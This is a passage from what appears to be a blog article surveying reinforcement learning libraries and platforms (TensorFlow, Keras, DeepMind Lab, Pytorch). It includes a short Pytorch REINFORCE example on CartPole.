TensorFlow is another well-known open-source library from Google, followed by more than 95,000 developers every day in areas such as natural language processing, intelligent chatbots, robotics, and more. The TensorFlow community has developed an extended version called TensorLayer, which provides popular RL modules that can be easily customized and assembled to tackle real-world machine learning challenges. The community allows for framework development in the most popular languages, such as Python, C, Java, JavaScript and Go. Google and its TensorFlow team are also in the process of coming up with a Swift-compatible version to enable machine learning on Apple platforms. Read How to implement Reinforcement Learning with TensorFlow

Keras

Keras makes it simple to implement neural networks in just a few lines of code, with fast execution. It provides senior developers and principal scientists with a high-level interface to the tensor computation framework TensorFlow, and it centers on the model architecture. So, if you have any existing RL models written in TensorFlow, you can pick up the Keras framework and transfer the learning to a related machine learning problem.

DeepMind Lab

DeepMind Lab is a Google 3D platform, customizable for agent-based AI research. It is used to understand how self-sufficient artificial agents learn complicated tasks in large, partially observed environments. With the victory of its AlphaGo program against professional Go players in early 2016, DeepMind captured the public’s attention. With its three hubs spread across London, Canada and France, the DeepMind team is focusing on core AI fundamentals, which includes building a single AI system backed by state-of-the-art methods and distributional reinforcement learning. To know more about how DeepMind Lab works, read How Google’s DeepMind is creating images with artificial intelligence.

Pytorch

Pytorch, open sourced by Facebook, is another well-known deep learning library adopted by many reinforcement learning researchers. It was recently preferred almost unanimously by the top 10 finishers in a Kaggle competition. With dynamic neural networks and strong GPU acceleration, RL practitioners use it extensively to conduct experiments implementing policy-based agents and to create new adventures. One notable research project is Playing GridWorld, where Pytorch demonstrated its capabilities with renowned RL algorithms like policy gradient and a simplified actor-critic method.
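To give a flavour of what a policy-gradient experiment looks like in Pytorch, here is a minimal REINFORCE sketch on CartPole. The network size, learning rate and episode count are illustrative choices, not taken from any of the projects above, and the classic pre-2021 Gym API is assumed.

```python
# A minimal REINFORCE (policy gradient) sketch in PyTorch on CartPole.
# pip install torch gym; hyperparameters below are illustrative.
import gym
import torch
import torch.nn as nn

env = gym.make("CartPole-v1")
policy = nn.Sequential(nn.Linear(4, 64), nn.ReLU(), nn.Linear(64, 2))
optimizer = torch.optim.Adam(policy.parameters(), lr=1e-2)

for _ in range(200):                      # a small number of training episodes
    obs = env.reset()
    log_probs, rewards = [], []
    done = False
    while not done:
        logits = policy(torch.as_tensor(obs, dtype=torch.float32))
        dist = torch.distributions.Categorical(logits=logits)
        action = dist.sample()            # sample from the current policy
        log_probs.append(dist.log_prob(action))
        obs, reward, done, _ = env.step(action.item())
        rewards.append(reward)

    # REINFORCE: scale the episode's log-probabilities by its total return
    episode_return = sum(rewards)
    loss = -torch.stack(log_probs).sum() * episode_return
    optimizer.zero_grad()
    loss.backward()
    optimizer.step()
```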
Summing It Up

There you have it: the top tools and libraries for reinforcement learning. The list doesn't end here, as a lot of work is happening on platforms and libraries for scaling reinforcement learning. Frameworks like RL4J and RLlib are already in development and will soon be fully available for developers to simulate their models in their preferred coding language.